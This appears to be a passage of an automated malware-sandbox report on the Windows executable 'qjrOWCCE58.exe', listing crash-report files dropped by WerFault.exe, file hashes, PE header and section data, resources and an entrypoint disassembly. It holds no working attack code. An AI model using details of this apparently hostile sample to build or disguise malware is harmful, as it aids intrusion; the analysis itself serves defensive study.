Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501791" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C2C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:38 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	95266
Entropy (8bit):	2.1510015050081264
Encrypted:	false
SSDEEP:	768:+A3n6XSLfzolcJP7Fvv444ldafW4YUs8:/bboIPpvvaldafW4YUs8
MD5:	1E7B0A782E7E255A743111106FDA01F4
SHA1:	6E503317B9AB2A60DFB2E687FF18DAF139CE53CC
SHA-256:	C479C1B148A74FC7C8761127F3A73A0E67CA072FB604B12A7072B360440344F5
SHA-512:	5293826821F8880AE5EB98DDA8DC236DB88916586F925A7494FE39812222CD521E2843156D2F78063FCFC7405630796A7494C6D4E89CBB367312B7E0A360A197
Malicious:	false
Preview:	MDMP....... .........sb....................................D....?..........T.......8...........T............"...Q...........................................................................................U...........B......T.......GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5015.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8414
Entropy (8bit):	3.703074171870118
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiXi6IeT+6YWrSUCmwgmfwS3CpBE89b0Asf3D8m:RrlsNiy6Ieq6YKSUCmwgmfwSM0Tf3d
MD5:	E5E79DB734B573FC3D62A2FAB266D0D1
SHA1:	31CD7AE4F6A2D6F15CB35983C8AD85ABA35C71A3
SHA-256:	CB8C4E7222E59391ED027F7640B5EF16EC3B7A6F65D9D90E3DA666A1C9F3D855
SHA-512:	626F022F6712ADE4A93846A76949C3F49DD47D67E83630E78FB2F44EE495D5C97C539927C9DA928FC96AE646835FDC032AF5D874841D9C732FE63610DB17B80D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51AC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.491275091994293
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI9HyyWgc8sqYj2O/8fm8M4JyHMFV+q8vyHo/S4Jd:uITfcAyTgrsqYyrJgAKgoa4Jd
MD5:	22A9BC37AA68983F17219F8759BE6329
SHA1:	CA6670108782C1C595F25485BBE2FC85B004B990
SHA-256:	F2A900B3E240C515018C0F4107BF7C716AE4D7A8FF2EBDD7B66F6366DB383597
SHA-512:	19734112F4D25A5070ECFC1F0F6C3C8EFB60AC99E38602C5F63B3048B10609997BDAD1C776DBFB06F829E2F491DA7286F9A8E4EF5AE288950F63A1B4366D0B2B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501791" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8414
Entropy (8bit):	3.7024272119958797
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiXd6IxLHv6YWwSUWmggmfwS3CpB889bfAsf0sVm:RrlsNit6IxTv6YhSUWmggmfwS0fTf2
MD5:	5499AA13B33AAC94867AB8E7FE331230
SHA1:	EA921C47B6FD21F988AB0B3EB2B6C19B5C3979E3
SHA-256:	2A5BB51D3D4DA337239661BB858E5ED8188BC2E2A9F22FEAA12C21D7AC7F1A0B
SHA-512:	1CEB67E0CD7684E3FBF5B9639C4F28448A803273DD331C7DF59B771C67A06AE2E91525DCC6A0FF755C046CB9A252A9181D243B53004C333E2BFD613FAF291CE0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER774.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.486743778621484
Encrypted:	false
SSDEEP:	48:cvIwSD8zs3NJgtWI9HyyWgc8sqYjRS8fm8M4JyHMFK+q8vyHo/S4Jd:uITf3nAyTgrsqYBJgjKgoa4Jd
MD5:	FA506C2DCBE1904491B680DF01070820
SHA1:	728BE6F69194C7D0B87D04FBEA761D2A47F80622
SHA-256:	F84997D5C5577D189AF9D725F815128F6FC9B4F2370A831DDAB26FC1BF068442
SHA-512:	F20EA9B1E7372879D56C903AEC9B9CD6C662C9E1232E6EE4F741FAB525CC32B36D83C11A034514774CA282004888AB24C74F6CD02FEAA296EF6BD47692679B2C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501790" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE842.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:12 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	56884
Entropy (8bit):	2.415860924030049
Encrypted:	false
SSDEEP:	192:fPKgcsg6XO6/kemPrvqTYduUPrJ0RKOmDPvCgFo5cM8V/CdNA99XoABNn/TnWAPH:Ks5+647qTaR69yPreWM8V/CduYAP3
MD5:	084523D0081F9FCB92BDB2BE918C02B4
SHA1:	D452A6850378959506A7E9DE9B32DB4B0301B014
SHA-256:	DE5096BBEC9A850DB1AB1CC02E1D4A705BC16374233272BD1C0D1876DDE39504
SHA-512:	AA31ACE0BAA48F7999C45EB9405E2CE84AA47245F0A732E12D985461B1CC8A4C74175DE90AD7D7455C074E0CFAF0AF8CC468D05965EAB3AA29DE2E0406FA44FC
Malicious:	false
Preview:	MDMP....... .........sb....................................t...8,..........T.......8...........T...........p...............l...........X....................................................................U...........B..............GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC5A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8396
Entropy (8bit):	3.7035592860710342
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiXi67Tn6YW3SU8q8EGgmfwS3CpB189blAsffXm:RrlsNiS6f6YWSU8qWgmfwS/lTfe
MD5:	042D67A49C3B904D8EC80BFBCA455927
SHA1:	94D0F9197194061DD0A56F87CE23A447E22D7E3D
SHA-256:	1903C1E93B0B51E4B2E180D790BA2B0A257615046793D41072001E52BDD3356F
SHA-512:	E36325D464D6DB3C45DD759BAA5B58E39ED866F18F87A864C2D1A8FB5F34EBEAAB4822EA8A187B9A457C95B3B024DF373B70303BFE96510A1D40F0ACF0DE889F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED84.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.48831411399447
Encrypted:	false
SSDEEP:	48:cvIwSD8zs3NJgtWI9HyyWgc8sqYjD8fm8M4JyHMF7+q8vyHo/S4Jd:uITf3nAyTgrsqYcJgyKgoa4Jd
MD5:	2013DBBC396E4181584618890D6303E5
SHA1:	6242779877B071CB5671ECDF90B6001A8CB50024
SHA-256:	51B5503DCB1AC878B6F684FEA0592C9A3207167DC33A3562471D3879C1963139
SHA-512:	8CACB344D009BA19CC292A7D72652EB64671AFD2EB2E12EF3CC46F56567212005EF24FB8DAF1C721260CB1B1B89A32270C8A3FEDF220ADC9ACDB72EB4468753F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501790" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF726.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:16 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	66184
Entropy (8bit):	2.4170302037551803
Encrypted:	false
SSDEEP:	384:nhA6LAuRhVz7qTWRHmAT6cgoypOWkHfZwHyPreWoGbNc6oq:W6LzRTcCOJpTkHf/rTcX
MD5:	03152090D258B31B0A5841B5F8DE9894
SHA1:	6148F0F788B953E99BE2ED87F5F576780540AFC8
SHA-256:	D314B293B63F3317BC57C229001786D52B211C4713718A2D07AB61870430B532
SHA-512:	9F01EE60A270631BE9C611833FE93371AA5889928EB4729E53291C125E1E68CA380C9E1948D190A4709A3BCC1E629D667C293C3B0CCAB337EDAEF7BE41F88E6E
Malicious:	false
Preview:	MDMP....... .........sb....................................T..../..........T.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9A8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8408
Entropy (8bit):	3.7054266064062933
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiX56l6YWISUcmqgmfwS3CpBK89b4AsfAIm:RrlsNip6l6YpSUcmqgmfwSe4TfW
MD5:	A035334EC161C6D7F5680C9A8DA9E44E
SHA1:	C1FBBCDBFA56F9C9793687E7E9E4E07D04CBE7B5
SHA-256:	A52129FD48EA1899AEA1136E9EA74D7CF6DCE8799488892BE8E16B99DF137145
SHA-512:	399CA2D36E67F88EB86BBFC135C5D12FD5646E9BD54B08F9A96EDFB51F93CAF39002D6338B8BC69152071087A73E79B265ABB0A63C5B8C6D65553F3E3C33B0EA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAD2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.488609169147605
Encrypted:	false
SSDEEP:	48:cvIwSD8zs3NJgtWI9HyyWgc8sqYjeBb8fm8M4JyHMFHD+q8vyHo/S4Jd:uITf3nAyTgrsqYSBYJgsDKgoa4Jd
MD5:	4AF206325FCB38DF334DC89D2E124161
SHA1:	56A544ABC7059C20AFAE962EE400AF6BA82681F3
SHA-256:	9AFB525540C42E4FD140FF4833FA4CCCCEAC223F91909863883732E00CE334B1
SHA-512:	1742F305A72484C29C15B6C5755A31C1D41D789A7C9D2C46B205646B8C08E9A9376592B2D58E8D0D4B2C88154A3440A6297EFE9AEAFB8996D8DD23FC8AA3C972
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501790" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.13596800103892
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	qjrOWCCE58.exe
File size:	382976
MD5:	732132623989caae367e0878298b7e9b
SHA1:	e493be600aa8ecf7384ac3f23454daf6fdd1821d
SHA256:	32f431ba791fcd1f53e53b26447c9dbf59983549f567bac43ea9578b98de4ca8
SHA512:	6b98ae444381d8782ea5177694f5a5377e22f360d42bd579463f9da5c9b82cef77aa4bef489d23ca5cb6cc503e906f8231e9a79650cb79ebb5b226fd8c5c95ae
SSDEEP:	6144:SOHGuNkVVlgz8djnAv3GsrCynHcyMHwLQ9zsF2RcS3+Xyiv+Y6itQ7VsS:SihyV368djA+spnHcyMQwSS3+B+QGVs
TLSH:	DB84BE10BB90C034F5B761F48A76C3A8793EBDA19B2455CB62D43AEE66346E0EC31357
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n...<8..n...<...n.......n...n..En...<)..n...<9..n...<<..n..Rich.n..................PE..L.....p`...................

File Icon


Icon Hash:	c6e8e8e8e8f0e461

Static PE Info

General

Entrypoint:	0x40c1b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x6070DBE8 [Fri Apr 9 22:57:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6155d4d1fe9d4982682a0787c78cb5b8

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F2F58C86E2Bh
call 00007F2F58C79B06h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042A518h
push 0040FE10h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [004515A4h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004010ACh]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007F2F58C79B18h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007F2F58C79C47h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F2F58C79C84h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007F2F58C87ECAh
add esp, 04h
test eax, eax
jne 00007F2F58C79AFCh
push 0000001Ch
call 00007F2F58C79C3Ch
add esp, 04h
call 00007F2F58C7FA44h
test eax, eax
jne 00007F2F58C79AFCh
push 00000010h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[LNK] VS2008 build 21022
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ac0c	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0xbf20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1310	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8ab8	0x18	.text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8a70	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x2c4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2acb6	0x2ae00	False	0.42072476312	data	6.17133186898	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2c000	0x65428	0x26600	False	0.96707680171	data	7.92962544889	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0xbf20	0xc000	False	0.537943522135	data	5.62006436442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x9c018	0x2	data	Uzbek	Italy
AFX_DIALOG_LAYOUT	0x9c010	0x2	data	Uzbek	Italy
MIMELA	0x9bc80	0x2fa	ASCII text, with very long lines, with no line terminators	Uzbek	Italy
RT_CURSOR	0x9c020	0x130	data	Uzbek	Italy
RT_CURSOR	0x9c168	0x130	data	Uzbek	Italy
RT_CURSOR	0x9c298	0xf0	data	Uzbek	Italy
RT_CURSOR	0x9c388	0x10a8	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_ICON	0x92720	0x6c8	data	Uzbek	Italy
RT_ICON	0x92de8	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x93350	0x10a8	data	Uzbek	Italy
RT_ICON	0x943f8	0x988	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_ICON	0x94d80	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x95238	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Uzbek	Italy
RT_ICON	0x95ae0	0x6c8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Uzbek	Italy
RT_ICON	0x961a8	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
